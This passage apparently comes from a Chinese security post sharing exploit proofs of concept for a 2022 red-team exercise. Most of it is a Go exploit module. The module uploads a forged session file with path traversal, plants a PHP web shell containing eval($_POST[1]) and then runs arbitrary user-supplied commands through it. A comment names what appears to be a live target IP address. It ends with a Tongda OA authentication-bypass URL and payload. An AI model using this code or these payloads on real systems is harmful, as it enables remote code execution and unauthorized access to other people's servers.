cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9rnContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"rnrnlang|s:52:"../../../../../../../../../../../../../../../../tmp/";rn--1d52ba2a11ad8a915eddab1a0e85acd9--rn"
if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
time.Sleep(time.Second * 5)
uri2 := "/api/v1/device/bugsInfo"
cfg2 := httpclient.NewPostRequestConfig(uri2)
cfg2.VerifyTls = false
cfg2.FollowRedirect = false
cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
cfg2.Data = "--4803b59d015026999b45993b1245f0efrnContent-Disposition: form-data; name="file"; filename="compose.php"rnrn<?php eval($_POST[1]);?>rn--4803b59d015026999b45993b1245f0ef--rn"
if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
uri3 := "/mail/include/header_main.php"
cfg3 := httpclient.NewPostRequestConfig(uri3)
cfg3.VerifyTls = false
cfg3.FollowRedirect = false
cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
cfg3.Data = "1=print+md5%281%29%3B"
if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
}
}
}
return false
},
// Exploit callback: repeats the scan callback's upload sequence, then posts
// the user-supplied `cmd` parameter (URL-escaped) and returns the raw
// response body in Output. The duplicated request setup is not shared
// with the scan callback.
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
cmd := ss.Params["cmd"].(string)
u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
uri1 := "/api/v1/device/bugsInfo"
cfg1 := httpclient.NewPostRequestConfig(uri1)
cfg1.VerifyTls = false
cfg1.FollowRedirect = false
cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9rnContent-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"rnrnlang|s:52:"../../../../../../../../../../../../../../../../tmp/";rn--1d52ba2a11ad8a915eddab1a0e85acd9--rn"
if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
time.Sleep(time.Second * 5)
uri2 := "/api/v1/device/bugsInfo"
cfg2 := httpclient.NewPostRequestConfig(uri2)
cfg2.VerifyTls = false
cfg2.FollowRedirect = false
cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
cfg2.Data = "--4803b59d015026999b45993b1245f0efrnContent-Disposition: form-data; name="file"; filename="compose.php"rnrn<?php eval($_POST[1]);?>rn--4803b59d015026999b45993b1245f0ef--rn"
if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
uri3 := "/mail/include/header_main.php"
cfg3 := httpclient.NewPostRequestConfig(uri3)
cfg3.VerifyTls = false
cfg3.FollowRedirect = false
cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
expResult.Output = resp3.RawBody
expResult.Success = true
}
}
}
return expResult
},
))
}
//https://222.75.146.134:4433
17、通达OA登录认证绕过
URL
/module/retrieve_pwd/header.inc.php?_ZQA_ID=3fb5b8eadff9c793
Payload
SESSION%5BLOGIN_THEME%5D=15&_SESSION%5BLOGIN_USER_ID%5D=1&SESSION%5BLOGIN_UD%5D=1
原文始发于微信公众号(安全透视镜):【2022护网情报更新】护网漏洞更新,含POC